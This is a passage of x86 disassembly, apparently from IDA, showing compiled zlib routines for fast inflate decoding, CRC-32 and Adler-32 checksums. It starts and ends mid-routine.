loc_40CDF8: ; CODE XREF: sub_40CCA6+120�j
; sub_40CCA6+139�j ...
mov eax, [ebp+var_C]
push eax
mov ecx, [ebp+arg_20]
mov edx, [ecx+28h]
push edx
mov eax, [ebp+arg_20]
call dword ptr [eax+24h]
add esp, 8
mov eax, [ebp+var_4]
jmp short loc_40CE27
; ---------------------------------------------------------------------------
loc_40CE11: ; CODE XREF: sub_40CCA6+105�j
; sub_40CCA6+10E�j
mov ecx, [ebp+var_C]
push ecx
mov edx, [ebp+arg_20]
mov eax, [edx+28h]
push eax
mov ecx, [ebp+arg_20]
call dword ptr [ecx+24h]
add esp, 8
xor eax, eax
loc_40CE27: ; CODE XREF: sub_40CCA6+32�j
; sub_40CCA6+BB�j ...
mov esp, ebp
pop ebp
retn
sub_40CCA6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40CE2B proc near ; CODE XREF: sub_40AF6D+1A8�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
mov dword ptr [eax], 9
mov ecx, [ebp+arg_4]
mov dword ptr [ecx], 5
mov edx, [ebp+arg_8]
mov dword ptr [edx], offset dword_413340
mov eax, [ebp+arg_C]
mov dword ptr [eax], offset dword_414340
xor eax, eax
pop ebp
retn
sub_40CE2B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40CE56 proc near ; CODE XREF: sub_40A04E+106�p
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 48h
mov eax, [ebp+arg_14]
mov ecx, [eax]
mov [ebp+var_4], ecx
mov edx, [ebp+arg_14]
mov eax, [edx+4]
mov [ebp+var_34], eax
mov ecx, [ebp+arg_10]
mov edx, [ecx+20h]
mov [ebp+var_10], edx
mov eax, [ebp+arg_10]
mov ecx, [eax+1Ch]
mov [ebp+var_28], ecx
mov edx, [ebp+arg_10]
mov eax, [edx+34h]
mov [ebp+var_8], eax
mov ecx, [ebp+arg_10]
mov edx, [ebp+var_8]
cmp edx, [ecx+30h]
jnb short loc_40CEA4
mov eax, [ebp+arg_10]
mov ecx, [eax+30h]
sub ecx, [ebp+var_8]
sub ecx, 1
mov [ebp+var_38], ecx
jmp short loc_40CEB0
; ---------------------------------------------------------------------------
loc_40CEA4: ; CODE XREF: sub_40CE56+3B�j
mov edx, [ebp+arg_10]
mov eax, [edx+2Ch]
sub eax, [ebp+var_8]
mov [ebp+var_38], eax
loc_40CEB0: ; CODE XREF: sub_40CE56+4C�j
mov ecx, [ebp+var_38]
mov [ebp+var_2C], ecx
mov edx, [ebp+arg_0]
mov eax, dword_4132F8[edx*4]
mov [ebp+var_24], eax
mov ecx, [ebp+arg_4]
mov edx, dword_4132F8[ecx*4]
mov [ebp+var_30], edx
loc_40CED0: ; CODE XREF: sub_40CE56+AF�j
; sub_40CE56+639�j
cmp [ebp+var_28], 14h
jnb short loc_40CF07
mov eax, [ebp+var_34]
sub eax, 1
mov [ebp+var_34], eax
mov ecx, [ebp+var_4]
xor edx, edx
mov dl, [ecx]
mov ecx, [ebp+var_28]
shl edx, cl
mov eax, [ebp+var_10]
or eax, edx
mov [ebp+var_10], eax
mov ecx, [ebp+var_4]
add ecx, 1
mov [ebp+var_4], ecx
mov edx, [ebp+var_28]
add edx, 8
mov [ebp+var_28], edx
jmp short loc_40CED0
; ---------------------------------------------------------------------------
loc_40CF07: ; CODE XREF: sub_40CE56+7E�j
mov eax, [ebp+var_10]
and eax, [ebp+var_24]
mov ecx, [ebp+arg_8]
lea edx, [ecx+eax*8]
mov [ebp+var_1C], edx
mov eax, [ebp+var_1C]
xor ecx, ecx
mov cl, [eax]
mov [ebp+var_20], ecx
cmp [ebp+var_20], 0
jnz short loc_40CF6A
mov edx, [ebp+var_1C]
xor eax, eax
mov al, [edx+1]
mov ecx, eax
mov edx, [ebp+var_10]
shr edx, cl
mov [ebp+var_10], edx
mov eax, [ebp+var_1C]
xor ecx, ecx
mov cl, [eax+1]
mov edx, [ebp+var_28]
sub edx, ecx
mov [ebp+var_28], edx
mov eax, [ebp+var_8]
mov ecx, [ebp+var_1C]
mov dl, [ecx+4]
mov [eax], dl
mov eax, [ebp+var_8]
add eax, 1
mov [ebp+var_8], eax
mov ecx, [ebp+var_2C]
sub ecx, 1
mov [ebp+var_2C], ecx
jmp loc_40D482
; ---------------------------------------------------------------------------
loc_40CF6A: ; CODE XREF: sub_40CE56+CE�j
; sub_40CE56:loc_40D47D�j
mov edx, [ebp+var_1C]
xor eax, eax
mov al, [edx+1]
mov ecx, eax
mov edx, [ebp+var_10]
shr edx, cl
mov [ebp+var_10], edx
mov eax, [ebp+var_1C]
xor ecx, ecx
mov cl, [eax+1]
mov edx, [ebp+var_28]
sub edx, ecx
mov [ebp+var_28], edx
mov eax, [ebp+var_20]
and eax, 10h
test eax, eax
jz loc_40D2A9
mov ecx, [ebp+var_20]
and ecx, 0Fh
mov [ebp+var_20], ecx
mov edx, [ebp+var_20]
mov eax, [ebp+var_10]
and eax, dword_4132F8[edx*4]
mov ecx, [ebp+var_1C]
mov edx, [ecx+4]
add edx, eax
mov [ebp+var_14], edx
mov eax, [ebp+var_10]
mov ecx, [ebp+var_20]
shr eax, cl
mov [ebp+var_10], eax
mov ecx, [ebp+var_28]
sub ecx, [ebp+var_20]
mov [ebp+var_28], ecx
loc_40CFCF: ; CODE XREF: sub_40CE56+1B0�j
cmp [ebp+var_28], 0Fh
jnb short loc_40D008
mov edx, [ebp+var_34]
sub edx, 1
mov [ebp+var_34], edx
mov eax, [ebp+var_4]
xor ecx, ecx
mov cl, [eax]
mov edx, ecx
mov ecx, [ebp+var_28]
shl edx, cl
mov eax, [ebp+var_10]
or eax, edx
mov [ebp+var_10], eax
mov ecx, [ebp+var_4]
add ecx, 1
mov [ebp+var_4], ecx
mov edx, [ebp+var_28]
add edx, 8
mov [ebp+var_28], edx
jmp short loc_40CFCF
; ---------------------------------------------------------------------------
loc_40D008: ; CODE XREF: sub_40CE56+17D�j
mov eax, [ebp+var_10]
and eax, [ebp+var_30]
mov ecx, [ebp+arg_C]
lea edx, [ecx+eax*8]
mov [ebp+var_1C], edx
mov eax, [ebp+var_1C]
xor ecx, ecx
mov cl, [eax]
mov [ebp+var_20], ecx
loc_40D021: ; CODE XREF: sub_40CE56:loc_40D29F�j
mov edx, [ebp+var_1C]
xor eax, eax
mov al, [edx+1]
mov ecx, eax
mov edx, [ebp+var_10]
shr edx, cl
mov [ebp+var_10], edx
mov eax, [ebp+var_1C]
xor ecx, ecx
mov cl, [eax+1]
mov edx, [ebp+var_28]
sub edx, ecx
mov [ebp+var_28], edx
mov eax, [ebp+var_20]
and eax, 10h
test eax, eax
jz loc_40D1BD
mov ecx, [ebp+var_20]
and ecx, 0Fh
mov [ebp+var_20], ecx
loc_40D05A: ; CODE XREF: sub_40CE56+23B�j
mov edx, [ebp+var_28]
cmp edx, [ebp+var_20]
jnb short loc_40D093
mov eax, [ebp+var_34]
sub eax, 1
mov [ebp+var_34], eax
mov ecx, [ebp+var_4]
xor edx, edx
mov dl, [ecx]
mov ecx, [ebp+var_28]
shl edx, cl
mov eax, [ebp+var_10]
or eax, edx
mov [ebp+var_10], eax
mov ecx, [ebp+var_4]
add ecx, 1
mov [ebp+var_4], ecx
mov edx, [ebp+var_28]
add edx, 8
mov [ebp+var_28], edx
jmp short loc_40D05A
; ---------------------------------------------------------------------------
loc_40D093: ; CODE XREF: sub_40CE56+20A�j
mov eax, [ebp+var_20]
mov ecx, [ebp+var_10]
and ecx, dword_4132F8[eax*4]
mov edx, [ebp+var_1C]
mov eax, [edx+4]
add eax, ecx
mov [ebp+var_18], eax
mov edx, [ebp+var_10]
mov ecx, [ebp+var_20]
shr edx, cl
mov [ebp+var_10], edx
mov eax, [ebp+var_28]
sub eax, [ebp+var_20]
mov [ebp+var_28], eax
mov ecx, [ebp+var_2C]
sub ecx, [ebp+var_14]
mov [ebp+var_2C], ecx
mov edx, [ebp+arg_10]
mov eax, [ebp+var_8]
sub eax, [edx+28h]
cmp eax, [ebp+var_18]
jb short loc_40D12B
mov ecx, [ebp+var_8]
sub ecx, [ebp+var_18]
mov [ebp+var_C], ecx
mov edx, [ebp+var_8]
mov eax, [ebp+var_C]
mov cl, [eax]
mov [edx], cl
mov edx, [ebp+var_8]
add edx, 1
mov [ebp+var_8], edx
mov eax, [ebp+var_C]
add eax, 1
mov [ebp+var_C], eax
mov ecx, [ebp+var_14]
sub ecx, 1
mov [ebp+var_14], ecx
mov edx, [ebp+var_8]
mov eax, [ebp+var_C]
mov cl, [eax]
mov [edx], cl
mov edx, [ebp+var_8]
add edx, 1
mov [ebp+var_8], edx
mov eax, [ebp+var_C]
add eax, 1
mov [ebp+var_C], eax
mov ecx, [ebp+var_14]
sub ecx, 1
mov [ebp+var_14], ecx
jmp short loc_40D18D
; ---------------------------------------------------------------------------
loc_40D12B: ; CODE XREF: sub_40CE56+27E�j
mov edx, [ebp+arg_10]
mov eax, [ebp+var_8]
sub eax, [edx+28h]
mov ecx, [ebp+var_18]
sub ecx, eax
mov [ebp+var_20], ecx
mov edx, [ebp+arg_10]
mov eax, [edx+2Ch]
sub eax, [ebp+var_20]
mov [ebp+var_C], eax
mov ecx, [ebp+var_14]
cmp ecx, [ebp+var_20]
jbe short loc_40D18D
mov edx, [ebp+var_14]
sub edx, [ebp+var_20]
mov [ebp+var_14], edx
loc_40D159: ; CODE XREF: sub_40CE56+32C�j
mov eax, [ebp+var_8]
mov ecx, [ebp+var_C]
mov dl, [ecx]
mov [eax], dl
mov eax, [ebp+var_8]
add eax, 1
mov [ebp+var_8], eax
mov ecx, [ebp+var_C]
add ecx, 1
mov [ebp+var_C], ecx
mov edx, [ebp+var_20]
sub edx, 1
mov [ebp+var_20], edx
cmp [ebp+var_20], 0
jnz short loc_40D159
mov eax, [ebp+arg_10]
mov ecx, [eax+28h]
mov [ebp+var_C], ecx
loc_40D18D: ; CODE XREF: sub_40CE56+2D3�j
; sub_40CE56+2F8�j ...
mov edx, [ebp+var_8]
mov eax, [ebp+var_C]
mov cl, [eax]
mov [edx], cl
mov edx, [ebp+var_8]
add edx, 1
mov [ebp+var_8], edx
mov eax, [ebp+var_C]
add eax, 1
mov [ebp+var_C], eax
mov ecx, [ebp+var_14]
sub ecx, 1
mov [ebp+var_14], ecx
cmp [ebp+var_14], 0
jnz short loc_40D18D
jmp loc_40D2A4
; ---------------------------------------------------------------------------
loc_40D1BD: ; CODE XREF: sub_40CE56+1F5�j
mov edx, [ebp+var_20]
and edx, 40h
test edx, edx
jnz short loc_40D1FB
mov eax, [ebp+var_1C]
mov ecx, [eax+4]
mov edx, [ebp+var_1C]
lea eax, [edx+ecx*8]
mov [ebp+var_1C], eax
mov ecx, [ebp+var_20]
mov edx, [ebp+var_10]
and edx, dword_4132F8[ecx*4]
mov eax, [ebp+var_1C]
lea ecx, [eax+edx*8]
mov [ebp+var_1C], ecx
mov edx, [ebp+var_1C]
xor eax, eax
mov al, [edx]
mov [ebp+var_20], eax
jmp loc_40D29F
; ---------------------------------------------------------------------------
loc_40D1FB: ; CODE XREF: sub_40CE56+36F�j
mov ecx, [ebp+arg_14]
mov dword ptr [ecx+18h], offset aInvalidDista_0 ; "invalid distance code"
mov edx, [ebp+arg_14]
mov eax, [edx+4]
sub eax, [ebp+var_34]
mov [ebp+var_14], eax
mov ecx, [ebp+var_28]
shr ecx, 3
cmp ecx, [ebp+var_14]
jnb short loc_40D227
mov edx, [ebp+var_28]
shr edx, 3
mov [ebp+var_3C], edx
jmp short loc_40D22D
; ---------------------------------------------------------------------------
loc_40D227: ; CODE XREF: sub_40CE56+3C4�j
mov eax, [ebp+var_14]
mov [ebp+var_3C], eax
loc_40D22D: ; CODE XREF: sub_40CE56+3CF�j
mov ecx, [ebp+var_3C]
mov [ebp+var_14], ecx
mov edx, [ebp+var_34]
add edx, [ebp+var_14]
mov [ebp+var_34], edx
mov eax, [ebp+var_4]
sub eax, [ebp+var_14]
mov [ebp+var_4], eax
mov ecx, [ebp+var_14]
shl ecx, 3
mov edx, [ebp+var_28]
sub edx, ecx
mov [ebp+var_28], edx
mov eax, [ebp+arg_10]
mov ecx, [ebp+var_10]
mov [eax+20h], ecx
mov edx, [ebp+arg_10]
mov eax, [ebp+var_28]
mov [edx+1Ch], eax
mov ecx, [ebp+arg_14]
mov edx, [ebp+var_34]
mov [ecx+4], edx
mov eax, [ebp+arg_14]
mov ecx, [ebp+var_4]
sub ecx, [eax]
mov edx, [ebp+arg_14]
mov eax, [edx+8]
add eax, ecx
mov ecx, [ebp+arg_14]
mov [ecx+8], eax
mov edx, [ebp+arg_14]
mov eax, [ebp+var_4]
mov [edx], eax
mov ecx, [ebp+arg_10]
mov edx, [ebp+var_8]
mov [ecx+34h], edx
mov eax, 0FFFFFFFDh
jmp loc_40D527
; ---------------------------------------------------------------------------
loc_40D29F: ; CODE XREF: sub_40CE56+3A0�j
jmp loc_40D021
; ---------------------------------------------------------------------------
loc_40D2A4: ; CODE XREF: sub_40CE56+362�j
jmp loc_40D482
; ---------------------------------------------------------------------------
loc_40D2A9: ; CODE XREF: sub_40CE56+13E�j
mov eax, [ebp+var_20]
and eax, 40h
test eax, eax
jnz short loc_40D331
mov ecx, [ebp+var_1C]
mov edx, [ecx+4]
mov eax, [ebp+var_1C]
lea ecx, [eax+edx*8]
mov [ebp+var_1C], ecx
mov edx, [ebp+var_20]
mov eax, [ebp+var_10]
and eax, dword_4132F8[edx*4]
mov ecx, [ebp+var_1C]
lea edx, [ecx+eax*8]
mov [ebp+var_1C], edx
mov eax, [ebp+var_1C]
xor ecx, ecx
mov cl, [eax]
mov [ebp+var_20], ecx
cmp [ebp+var_20], 0
jnz short loc_40D32C
mov edx, [ebp+var_1C]
xor eax, eax
mov al, [edx+1]
mov ecx, eax
mov edx, [ebp+var_10]
shr edx, cl
mov [ebp+var_10], edx
mov eax, [ebp+var_1C]
xor ecx, ecx
mov cl, [eax+1]
mov edx, [ebp+var_28]
sub edx, ecx
mov [ebp+var_28], edx
mov eax, [ebp+var_8]
mov ecx, [ebp+var_1C]
mov dl, [ecx+4]
mov [eax], dl
mov eax, [ebp+var_8]
add eax, 1
mov [ebp+var_8], eax
mov ecx, [ebp+var_2C]
sub ecx, 1
mov [ebp+var_2C], ecx
jmp loc_40D482
; ---------------------------------------------------------------------------
loc_40D32C: ; CODE XREF: sub_40CE56+490�j
jmp loc_40D47D
; ---------------------------------------------------------------------------
loc_40D331: ; CODE XREF: sub_40CE56+45B�j
mov edx, [ebp+var_20]
and edx, 20h
test edx, edx
jz loc_40D3D9
mov eax, [ebp+arg_14]
mov ecx, [eax+4]
sub ecx, [ebp+var_34]
mov [ebp+var_14], ecx
mov edx, [ebp+var_28]
shr edx, 3
cmp edx, [ebp+var_14]
jnb short loc_40D361
mov eax, [ebp+var_28]
shr eax, 3
mov [ebp+var_40], eax
jmp short loc_40D367
; ---------------------------------------------------------------------------
loc_40D361: ; CODE XREF: sub_40CE56+4FE�j
mov ecx, [ebp+var_14]
mov [ebp+var_40], ecx
loc_40D367: ; CODE XREF: sub_40CE56+509�j
mov edx, [ebp+var_40]
mov [ebp+var_14], edx
mov eax, [ebp+var_34]
add eax, [ebp+var_14]
mov [ebp+var_34], eax
mov ecx, [ebp+var_4]
sub ecx, [ebp+var_14]
mov [ebp+var_4], ecx
mov edx, [ebp+var_14]
shl edx, 3
mov eax, [ebp+var_28]
sub eax, edx
mov [ebp+var_28], eax
mov ecx, [ebp+arg_10]
mov edx, [ebp+var_10]
mov [ecx+20h], edx
mov eax, [ebp+arg_10]
mov ecx, [ebp+var_28]
mov [eax+1Ch], ecx
mov edx, [ebp+arg_14]
mov eax, [ebp+var_34]
mov [edx+4], eax
mov ecx, [ebp+arg_14]
mov edx, [ebp+var_4]
sub edx, [ecx]
mov eax, [ebp+arg_14]
mov ecx, [eax+8]
add ecx, edx
mov edx, [ebp+arg_14]
mov [edx+8], ecx
mov eax, [ebp+arg_14]
mov ecx, [ebp+var_4]
mov [eax], ecx
mov edx, [ebp+arg_10]
mov eax, [ebp+var_8]
mov [edx+34h], eax
mov eax, 1
jmp loc_40D527
; ---------------------------------------------------------------------------
loc_40D3D9: ; CODE XREF: sub_40CE56+4E3�j
mov ecx, [ebp+arg_14]
mov dword ptr [ecx+18h], offset aInvalidLiter_0 ; "invalid literal/length code"
mov edx, [ebp+arg_14]
mov eax, [edx+4]
sub eax, [ebp+var_34]
mov [ebp+var_14], eax
mov ecx, [ebp+var_28]
shr ecx, 3
cmp ecx, [ebp+var_14]
jnb short loc_40D405
mov edx, [ebp+var_28]
shr edx, 3
mov [ebp+var_44], edx
jmp short loc_40D40B
; ---------------------------------------------------------------------------
loc_40D405: ; CODE XREF: sub_40CE56+5A2�j
mov eax, [ebp+var_14]
mov [ebp+var_44], eax
loc_40D40B: ; CODE XREF: sub_40CE56+5AD�j
mov ecx, [ebp+var_44]
mov [ebp+var_14], ecx
mov edx, [ebp+var_34]
add edx, [ebp+var_14]
mov [ebp+var_34], edx
mov eax, [ebp+var_4]
sub eax, [ebp+var_14]
mov [ebp+var_4], eax
mov ecx, [ebp+var_14]
shl ecx, 3
mov edx, [ebp+var_28]
sub edx, ecx
mov [ebp+var_28], edx
mov eax, [ebp+arg_10]
mov ecx, [ebp+var_10]
mov [eax+20h], ecx
mov edx, [ebp+arg_10]
mov eax, [ebp+var_28]
mov [edx+1Ch], eax
mov ecx, [ebp+arg_14]
mov edx, [ebp+var_34]
mov [ecx+4], edx
mov eax, [ebp+arg_14]
mov ecx, [ebp+var_4]
sub ecx, [eax]
mov edx, [ebp+arg_14]
mov eax, [edx+8]
add eax, ecx
mov ecx, [ebp+arg_14]
mov [ecx+8], eax
mov edx, [ebp+arg_14]
mov eax, [ebp+var_4]
mov [edx], eax
mov ecx, [ebp+arg_10]
mov edx, [ebp+var_8]
mov [ecx+34h], edx
mov eax, 0FFFFFFFDh
jmp loc_40D527
; ---------------------------------------------------------------------------
loc_40D47D: ; CODE XREF: sub_40CE56:loc_40D32C�j
jmp loc_40CF6A
; ---------------------------------------------------------------------------
loc_40D482: ; CODE XREF: sub_40CE56+10F�j
; sub_40CE56:loc_40D2A4�j ...
cmp [ebp+var_2C], 102h
jb short loc_40D495
cmp [ebp+var_34], 0Ah
jnb loc_40CED0
loc_40D495: ; CODE XREF: sub_40CE56+633�j
mov eax, [ebp+arg_14]
mov ecx, [eax+4]
sub ecx, [ebp+var_34]
mov [ebp+var_14], ecx
mov edx, [ebp+var_28]
shr edx, 3
cmp edx, [ebp+var_14]
jnb short loc_40D4B7
mov eax, [ebp+var_28]
shr eax, 3
mov [ebp+var_48], eax
jmp short loc_40D4BD
; ---------------------------------------------------------------------------
loc_40D4B7: ; CODE XREF: sub_40CE56+654�j
mov ecx, [ebp+var_14]
mov [ebp+var_48], ecx
loc_40D4BD: ; CODE XREF: sub_40CE56+65F�j
mov edx, [ebp+var_48]
mov [ebp+var_14], edx
mov eax, [ebp+var_34]
add eax, [ebp+var_14]
mov [ebp+var_34], eax
mov ecx, [ebp+var_4]
sub ecx, [ebp+var_14]
mov [ebp+var_4], ecx
mov edx, [ebp+var_14]
shl edx, 3
mov eax, [ebp+var_28]
sub eax, edx
mov [ebp+var_28], eax
mov ecx, [ebp+arg_10]
mov edx, [ebp+var_10]
mov [ecx+20h], edx
mov eax, [ebp+arg_10]
mov ecx, [ebp+var_28]
mov [eax+1Ch], ecx
mov edx, [ebp+arg_14]
mov eax, [ebp+var_34]
mov [edx+4], eax
mov ecx, [ebp+arg_14]
mov edx, [ebp+var_4]
sub edx, [ecx]
mov eax, [ebp+arg_14]
mov ecx, [eax+8]
add ecx, edx
mov edx, [ebp+arg_14]
mov [edx+8], ecx
mov eax, [ebp+arg_14]
mov ecx, [ebp+var_4]
mov [eax], ecx
mov edx, [ebp+arg_10]
mov eax, [ebp+var_8]
mov [edx+34h], eax
xor eax, eax
loc_40D527: ; CODE XREF: sub_40CE56+444�j
; sub_40CE56+57E�j ...
mov esp, ebp
pop ebp
retn
sub_40CE56 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
mov eax, offset dword_4146A4
pop ebp
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D535 proc near ; CODE XREF: sub_40F872+1D4�p
; sub_40F872+29A�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
cmp [ebp+arg_4], 0
jnz short loc_40D545
xor eax, eax
jmp loc_40D70E
; ---------------------------------------------------------------------------
loc_40D545: ; CODE XREF: sub_40D535+7�j
mov eax, [ebp+arg_0]
xor eax, 0FFFFFFFFh
mov [ebp+arg_0], eax
loc_40D54E: ; CODE XREF: sub_40D535+18C�j
cmp [ebp+arg_8], 8
jb loc_40D6C6
mov ecx, [ebp+arg_4]
xor edx, edx
mov dl, [ecx]
mov eax, [ebp+arg_0]
xor eax, edx
and eax, 0FFh
mov ecx, [ebp+arg_0]
shr ecx, 8
mov edx, dword_4146A4[eax*4]
xor edx, ecx
mov [ebp+arg_0], edx
mov eax, [ebp+arg_4]
add eax, 1
mov [ebp+arg_4], eax
mov ecx, [ebp+arg_4]
xor edx, edx
mov dl, [ecx]
mov eax, [ebp+arg_0]
xor eax, edx
and eax, 0FFh
mov ecx, [ebp+arg_0]
shr ecx, 8
mov edx, dword_4146A4[eax*4]
xor edx, ecx
mov [ebp+arg_0], edx
mov eax, [ebp+arg_4]
add eax, 1
mov [ebp+arg_4], eax
mov ecx, [ebp+arg_4]
xor edx, edx
mov dl, [ecx]
mov eax, [ebp+arg_0]
xor eax, edx
and eax, 0FFh
mov ecx, [ebp+arg_0]
shr ecx, 8
mov edx, dword_4146A4[eax*4]
xor edx, ecx
mov [ebp+arg_0], edx
mov eax, [ebp+arg_4]
add eax, 1
mov [ebp+arg_4], eax
mov ecx, [ebp+arg_4]
xor edx, edx
mov dl, [ecx]
mov eax, [ebp+arg_0]
xor eax, edx
and eax, 0FFh
mov ecx, [ebp+arg_0]
shr ecx, 8
mov edx, dword_4146A4[eax*4]
xor edx, ecx
mov [ebp+arg_0], edx
mov eax, [ebp+arg_4]
add eax, 1
mov [ebp+arg_4], eax
mov ecx, [ebp+arg_4]
xor edx, edx
mov dl, [ecx]
mov eax, [ebp+arg_0]
xor eax, edx
and eax, 0FFh
mov ecx, [ebp+arg_0]
shr ecx, 8
mov edx, dword_4146A4[eax*4]
xor edx, ecx
mov [ebp+arg_0], edx
mov eax, [ebp+arg_4]
add eax, 1
mov [ebp+arg_4], eax
mov ecx, [ebp+arg_4]
xor edx, edx
mov dl, [ecx]
mov eax, [ebp+arg_0]
xor eax, edx
and eax, 0FFh
mov ecx, [ebp+arg_0]
shr ecx, 8
mov edx, dword_4146A4[eax*4]
xor edx, ecx
mov [ebp+arg_0], edx
mov eax, [ebp+arg_4]
add eax, 1
mov [ebp+arg_4], eax
mov ecx, [ebp+arg_4]
xor edx, edx
mov dl, [ecx]
mov eax, [ebp+arg_0]
xor eax, edx
and eax, 0FFh
mov ecx, [ebp+arg_0]
shr ecx, 8
mov edx, dword_4146A4[eax*4]
xor edx, ecx
mov [ebp+arg_0], edx
mov eax, [ebp+arg_4]
add eax, 1
mov [ebp+arg_4], eax
mov ecx, [ebp+arg_4]
xor edx, edx
mov dl, [ecx]
mov eax, [ebp+arg_0]
xor eax, edx
and eax, 0FFh
mov ecx, [ebp+arg_0]
shr ecx, 8
mov edx, dword_4146A4[eax*4]
xor edx, ecx
mov [ebp+arg_0], edx
mov eax, [ebp+arg_4]
add eax, 1
mov [ebp+arg_4], eax
mov ecx, [ebp+arg_8]
sub ecx, 8
mov [ebp+arg_8], ecx
jmp loc_40D54E
; ---------------------------------------------------------------------------
loc_40D6C6: ; CODE XREF: sub_40D535+1D�j
cmp [ebp+arg_8], 0
jz short loc_40D708
loc_40D6CC: ; CODE XREF: sub_40D535+1D1�j
mov edx, [ebp+arg_4]
xor eax, eax
mov al, [edx]
mov ecx, [ebp+arg_0]
xor ecx, eax
and ecx, 0FFh
mov edx, [ebp+arg_0]
shr edx, 8
mov eax, dword_4146A4[ecx*4]
xor eax, edx
mov [ebp+arg_0], eax
mov ecx, [ebp+arg_4]
add ecx, 1
mov [ebp+arg_4], ecx
mov edx, [ebp+arg_8]
sub edx, 1
mov [ebp+arg_8], edx
cmp [ebp+arg_8], 0
jnz short loc_40D6CC
loc_40D708: ; CODE XREF: sub_40D535+195�j
mov eax, [ebp+arg_0]
xor eax, 0FFFFFFFFh
loc_40D70E: ; CODE XREF: sub_40D535+B�j
pop ebp
retn
sub_40D535 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D710 proc near ; DATA XREF: sub_40DAB5+133�o
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 10h
mov eax, [ebp+arg_0]
and eax, 0FFFFh
mov [ebp+var_4], eax
mov ecx, [ebp+arg_0]
shr ecx, 10h
and ecx, 0FFFFh
mov [ebp+var_8], ecx
cmp [ebp+arg_4], 0
jnz short loc_40D740
mov eax, 1
jmp loc_40D983
; ---------------------------------------------------------------------------
loc_40D740: ; CODE XREF: sub_40D710+24�j
; sub_40D710+265�j
cmp [ebp+arg_8], 0
jbe loc_40D97A
cmp [ebp+arg_8], 15B0h
jnb short loc_40D75B
mov edx, [ebp+arg_8]
mov [ebp+var_10], edx
jmp short loc_40D762
; ---------------------------------------------------------------------------
loc_40D75B: ; CODE XREF: sub_40D710+41�j
mov [ebp+var_10], 15B0h
loc_40D762: ; CODE XREF: sub_40D710+49�j
mov eax, [ebp+var_10]
mov [ebp+var_C], eax
mov ecx, [ebp+arg_8]
sub ecx, [ebp+var_C]
mov [ebp+arg_8], ecx
loc_40D771: ; CODE XREF: sub_40D710+20C�j
cmp [ebp+var_C], 10h
jl loc_40D921
mov edx, [ebp+arg_4]
xor eax, eax
mov al, [edx]
mov ecx, [ebp+var_4]
add ecx, eax
mov [ebp+var_4], ecx
mov edx, [ebp+var_8]
add edx, [ebp+var_4]
mov [ebp+var_8], edx
mov eax, [ebp+arg_4]
xor ecx, ecx
mov cl, [eax+1]
mov edx, [ebp+var_4]
add edx, ecx
mov [ebp+var_4], edx
mov eax, [ebp+var_8]
add eax, [ebp+var_4]
mov [ebp+var_8], eax
mov ecx, [ebp+arg_4]
xor edx, edx
mov dl, [ecx+2]
mov eax, [ebp+var_4]
add eax, edx
mov [ebp+var_4], eax
mov ecx, [ebp+var_8]
add ecx, [ebp+var_4]
mov [ebp+var_8], ecx
mov edx, [ebp+arg_4]
xor eax, eax
mov al, [edx+3]
mov ecx, [ebp+var_4]
add ecx, eax
mov [ebp+var_4], ecx
mov edx, [ebp+var_8]
add edx, [ebp+var_4]
mov [ebp+var_8], edx
mov eax, [ebp+arg_4]
xor ecx, ecx
mov cl, [eax+4]
mov edx, [ebp+var_4]
add edx, ecx
mov [ebp+var_4], edx
mov eax, [ebp+var_8]
add eax, [ebp+var_4]
mov [ebp+var_8], eax
mov ecx, [ebp+arg_4]
xor edx, edx
mov dl, [ecx+5]
mov eax, [ebp+var_4]
add eax, edx
mov [ebp+var_4], eax
mov ecx, [ebp+var_8]
add ecx, [ebp+var_4]
mov [ebp+var_8], ecx
mov edx, [ebp+arg_4]
xor eax, eax
mov al, [edx+6]
mov ecx, [ebp+var_4]
add ecx, eax
mov [ebp+var_4], ecx
mov edx, [ebp+var_8]
add edx, [ebp+var_4]
mov [ebp+var_8], edx
mov eax, [ebp+arg_4]
xor ecx, ecx
mov cl, [eax+7]
mov edx, [ebp+var_4]
add edx, ecx
mov [ebp+var_4], edx
mov eax, [ebp+var_8]
add eax, [ebp+var_4]
mov [ebp+var_8], eax
mov ecx, [ebp+arg_4]
xor edx, edx
mov dl, [ecx+8]
mov eax, [ebp+var_4]
add eax, edx
mov [ebp+var_4], eax
mov ecx, [ebp+var_8]
add ecx, [ebp+var_4]
mov [ebp+var_8], ecx
mov edx, [ebp+arg_4]
xor eax, eax
mov al, [edx+9]
mov ecx, [ebp+var_4]
add ecx, eax
mov [ebp+var_4], ecx
mov edx, [ebp+var_8]
add edx, [ebp+var_4]
mov [ebp+var_8], edx
mov eax, [ebp+arg_4]
xor ecx, ecx
mov cl, [eax+0Ah]
mov edx, [ebp+var_4]
add edx, ecx
mov [ebp+var_4], edx
mov eax, [ebp+var_8]
add eax, [ebp+var_4]
mov [ebp+var_8], eax
mov ecx, [ebp+arg_4]
xor edx, edx
mov dl, [ecx+0Bh]
mov eax, [ebp+var_4]
add eax, edx
mov [ebp+var_4], eax
mov ecx, [ebp+var_8]
add ecx, [ebp+var_4]
mov [ebp+var_8], ecx
mov edx, [ebp+arg_4]
xor eax, eax
mov al, [edx+0Ch]
